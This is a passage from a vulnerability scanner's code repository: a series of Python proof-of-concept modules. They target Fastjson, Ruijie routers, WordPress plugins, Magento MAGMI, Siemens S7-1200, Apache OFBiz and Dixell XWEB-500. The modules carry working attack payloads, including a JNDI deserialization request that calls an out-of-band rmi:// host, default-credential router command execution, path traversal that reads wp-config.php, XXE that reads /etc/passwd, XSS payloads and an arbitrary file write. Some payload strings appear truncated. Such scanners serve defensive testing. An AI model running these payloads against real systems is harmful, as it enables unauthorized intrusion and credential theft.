28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | 40 | path = """/cgi-bin/{{endpoint}}?LD_DEBUG=help""" 41 | method = "GET" 42 | data = """""" 43 | headers = {'Accept': '*/*'} 44 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 45 | 46 | if (resp0.status_code == 200) and ("""environment variable""" in resp0.text and """display library search paths""" in resp0.text): 47 | result["success"] = True 48 | result["info"] = info() 49 | result["payload"] = url+path 50 | 51 | except: 52 | result["success"] = False 53 | 54 | return result 55 | 56 | 57 | # Exploit, can be same with poc() 58 | def exp(url): 59 | return poc(url) 60 | 61 | 62 | # Utils 63 | def format_url(url): 64 | url = url.strip() 65 | if not ( url.startswith('http://') or url.startswith('https://') ): 66 | url = 'http://' + url 67 | url = url.rstrip('/') 68 | 69 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/fastjson/fastjson-1-2-62-rce.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from plugins.oob import verify_request, gen_oob_domain 3 | 4 | 5 | 6 | # Vuln Base Info 7 | def info(): 8 | return { 9 | "author": "cckuailong", 10 | "name": '''Fastjson 1.2.62 Deserialization RCE''', 11 | "description": '''''', 12 | "severity": "critical", 13 | "references": [ 14 | "https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson", 15 | "https://github.com/wyzxxz/fastjson_rce_tool" 16 | ], 17 | "classification": { 18 | "cvss-metrics": "", 19 | "cvss-score": "", 20 | "cve-id": "", 21 | "cwe-id": "" 22 | }, 23 | "metadata":{ 24 | "vuln-target": "", 25 | 26 | }, 27 | "tags": ["fastjson", "rce", "deserialization", "oast"], 28 | } 29 | 30 | 31 | # Vender Fingerprint 32 | def fingerprint(url): 33 | return True 34 | 35 | # Proof of Concept 36 | def poc(url): 37 | result = {} 38 | try: 39 | url = format_url(url) 40 | 41 | oob_domain,flag = gen_oob_domain() 42 | 43 | path = """/""" 44 | method = "POST" 45 | data = { 46 | "@type":"org.apache.xbean.propertyeditor.JndiConverter", 47 | "AsText":"rmi://{oob_domain}/exploit".format(oob_domain=oob_domain) 48 | } 49 | headers = {'Content-Type': 'application/json'} 50 | resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 51 | 52 | if verify_request(type="dns", flag=flag): 53 | result["success"] = True 54 | result["info"] = info() 55 | result["payload"] = url+path 56 | 57 | except: 58 | result["success"] = False 59 | 60 | return result 61 | 62 | 63 | # Exploit, can be same with poc() 64 | def exp(url): 65 | return poc(url) 66 | 67 | 68 | # Utils 69 | def format_url(url): 70 | url = url.strip() 71 | if not ( url.startswith('http://') or url.startswith('https://') ): 72 | url = 'http://' + url 73 | url = url.rstrip('/') 74 | 75 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/ruijie/ruijie-nbr1300g-exposure.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Ruijie NBR1300G Cli Password Leak''', 9 | "description": '''''', 10 | "severity": "medium", 11 | "references": [ 12 | "http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html", 13 | "https://www.ruijienetworks.com" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["ruijie", "exposure"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/WEB_VMS/LEVEL15/""" 40 | method = "POST" 41 | data = """command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.""" 42 | headers = {'Authorization': 'Basic Z3Vlc3Q6Z3Vlc3Q='} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""webmaster level 2 username guest password guest""" in resp0.text) and (resp0.status_code == 200): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-5368.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''WordPress Plugin WP Content Source Control - Directory Traversal''', 9 | "description": '''A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.''', 10 | "severity": "high", 11 | "references": [ 12 | "https://nvd.nist.gov/vuln/detail/CVE-2014-5368", 13 | "https://www.exploit-db.com/exploits/39287", 14 | "https://www.cvedetails.com/cve/CVE-2014-5368" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2014-5368", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "wordpress", "wp-plugin", "lfi"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "DB_NAME" in resp.text and "DB_PASSWORD" in resp.text: 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2020/CVE-2020-5777.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Remote Auth Bypass in MAGMI (Magento Mass Importer) Plugin <= v0.7.23''', 9 | "description": '''MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2020-5777", 18 | "cwe-id": "CWE-287" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2020", "magmi", "magento", "auth", "bypass", "plugin"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/index.php/catalogsearch/advanced/result/?name=e""" 39 | method = "GET" 40 | data = """""" 41 | headers = {'Connection': 'close'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if ("""Too many connections""" in resp0.text) and (resp0.status_code == 503): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/cves/2014/CVE-2014-2908.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting''', 9 | "description": '''A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/44687", 13 | "https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf", 14 | "https://nvd.nist.gov/vuln/detail/CVE-2014-2908" 15 | ], 16 | "classification": { 17 | "cvss-metrics": "", 18 | "cvss-score": "", 19 | "cve-id": "CVE-2014-2908", 20 | "cwe-id": "" 21 | }, 22 | "metadata":{ 23 | "vuln-target": "", 24 | 25 | }, 26 | "tags": ["cve", "cve2014", "xss", "siemens"], 27 | } 28 | 29 | 30 | # Vender Fingerprint 31 | def fingerprint(url): 32 | return True 33 | 34 | # Proof of Concept 35 | def poc(url): 36 | result = {} 37 | try: 38 | url = format_url(url) 39 | path = '/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter' 40 | 41 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 42 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 43 | result["success"] = True 44 | result["info"] = info() 45 | result["payload"] = url+path 46 | 47 | except: 48 | result["success"] = False 49 | 50 | return result 51 | 52 | 53 | # Exploit, can be same with poc() 54 | def exp(url): 55 | return poc(url) 56 | 57 | 58 | # Utils 59 | def format_url(url): 60 | url = url.strip() 61 | if not ( url.startswith('http://') or url.startswith('https://') ): 62 | url = 'http://' + url 63 | url = url.rstrip('/') 64 | 65 | return url -------------------------------------------------------------------------------- /modules/cves/2015/CVE-2015-2807.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)''', 9 | "description": '''Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/", 13 | "https://nvd.nist.gov/vuln/detail/CVE-2015-2807" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "", 17 | "cvss-score": "", 18 | "cve-id": "", 19 | "cwe-id": "" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2015", "wordpress", "wp-plugin", "xss"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | path = '/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' 39 | 40 | resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False) 41 | if resp.status_code == 200 and "" in resp.text and "text/html" in str(resp.headers): 42 | result["success"] = True 43 | result["info"] = info() 44 | result["payload"] = url+path 45 | 46 | except: 47 | result["success"] = False 48 | 49 | return result 50 | 51 | 52 | # Exploit, can be same with poc() 53 | def exp(url): 54 | return poc(url) 55 | 56 | 57 | # Utils 58 | def format_url(url): 59 | url = url.strip() 60 | if not ( url.startswith('http://') or url.startswith('https://') ): 61 | url = 'http://' + url 62 | url = url.rstrip('/') 63 | 64 | return url -------------------------------------------------------------------------------- /modules/cves/2018/CVE-2018-8033.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Apache OFBiz XXE''', 9 | "description": '''XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04''', 10 | "severity": "high", 11 | "references": [ 12 | "https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", 16 | "cvss-score": "", 17 | "cve-id": "CVE-2018-8033", 18 | "cwe-id": "CWE-200" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | 23 | }, 24 | "tags": ["cve", "cve2018", "apache", "ofbiz", "xxe"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/webtools/control/xmlrpc""" 39 | method = "POST" 40 | data = """]>&disclose;""" 41 | headers = {'Accept': '*/*', 'Accept-Language': 'en', 'Content-Type': 'application/xml'} 42 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 43 | 44 | if (re.search(r"""root:.*:0:0:""",resp0.text)) and (resp0.status_code == 200): 45 | result["success"] = True 46 | result["info"] = info() 47 | result["payload"] = url+path 48 | 49 | except: 50 | result["success"] = False 51 | 52 | return result 53 | 54 | 55 | # Exploit, can be same with poc() 56 | def exp(url): 57 | return poc(url) 58 | 59 | 60 | # Utils 61 | def format_url(url): 62 | url = url.strip() 63 | if not ( url.startswith('http://') or url.startswith('https://') ): 64 | url = 'http://' + url 65 | url = url.rstrip('/') 66 | 67 | return url -------------------------------------------------------------------------------- /modules/vulnerabilities/other/dixell-xweb500-filewrite.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Dixell XWEB-500 - Arbitrary File Write''', 9 | "description": '''''', 10 | "severity": "critical", 11 | "references": [ 12 | "https://www.exploit-db.com/exploits/50639" 13 | ], 14 | "classification": { 15 | "cvss-metrics": "", 16 | "cvss-score": "", 17 | "cve-id": "", 18 | "cwe-id": "" 19 | }, 20 | "metadata":{ 21 | "vuln-target": "", 22 | "google-dork":'''inurl:"xweb500.cgi"''' 23 | }, 24 | "tags": ["lfw", "iot", "dixell", "xweb500"], 25 | } 26 | 27 | 28 | # Vender Fingerprint 29 | def fingerprint(url): 30 | return True 31 | 32 | # Proof of Concept 33 | def poc(url): 34 | result = {} 35 | try: 36 | url = format_url(url) 37 | 38 | path = """/cgi-bin/logo_extra_upload.cgi""" 39 | method = "POST" 40 | data = """test.txt 41 | dixell-xweb500-filewrite""" 42 | headers = {'Content-Type': 'application/octet-stream'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | path = """/logo/test.txt""" 46 | method = "GET" 47 | data = """""" 48 | headers = {} 49 | resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 50 | 51 | if resp1.status_code == 200 and "dixell-xweb500-filewrite" in resp1.text: 52 | result["success"] = True 53 | result["info"] = info() 54 | result["payload"] = url+path 55 | 56 | except: 57 | result["success"] = False 58 | 59 | return result 60 | 61 | 62 | # Exploit, can be same with poc() 63 | def exp(url): 64 | return poc(url) 65 | 66 | 67 | # Utils 68 | def format_url(url): 69 | url = url.strip() 70 | if not ( url.startswith('http://') or url.startswith('https://') ): 71 | url = 'http://' + url 72 | url = url.rstrip('/') 73 | 74 | return url -------------------------------------------------------------------------------- /modules/cves/2017/CVE-2017-15287.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | # Vuln Base Info 5 | def info(): 6 | return { 7 | "author": "cckuailong", 8 | "name": '''Dreambox WebControl Reflected XSS''', 9 | "description": '''There is XSS in the BouquetEditor WebPlugin for Dream Multimedia Dreambox devices, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.''', 10 | "severity": "medium", 11 | "references": [ 12 | "https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf", 13 | "https://www.exploit-db.com/exploits/42986/" 14 | ], 15 | "classification": { 16 | "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", 17 | "cvss-score": "", 18 | "cve-id": "CVE-2017-15287", 19 | "cwe-id": "CWE-79" 20 | }, 21 | "metadata":{ 22 | "vuln-target": "", 23 | 24 | }, 25 | "tags": ["cve", "cve2017", "xss", "dreambox"], 26 | } 27 | 28 | 29 | # Vender Fingerprint 30 | def fingerprint(url): 31 | return True 32 | 33 | # Proof of Concept 34 | def poc(url): 35 | result = {} 36 | try: 37 | url = format_url(url) 38 | 39 | path = """/webadmin/pkg?command=""" 40 | method = "GET" 41 | data = """""" 42 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 43 | resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False) 44 | 45 | if ("""Unknown command: """ in resp0.text): 46 | result["success"] = True 47 | result["info"] = info() 48 | result["payload"] = url+path 49 | 50 | except: 51 | result["success"] = False 52 | 53 | return result 54 | 55 | 56 | # Exploit, can be same with poc() 57 | def exp(url): 58 | return poc(url) 59 | 60 | 61 | # Utils 62 | def format_url(url): 63 | url = url.strip() 64 | if not ( url.startswith('http://') or url.startswith('https://') ): 65 | url = 'http://' + url 66 | url = url.rstrip('/') 67 | 68 | return url --------------------------------------------------------------------------------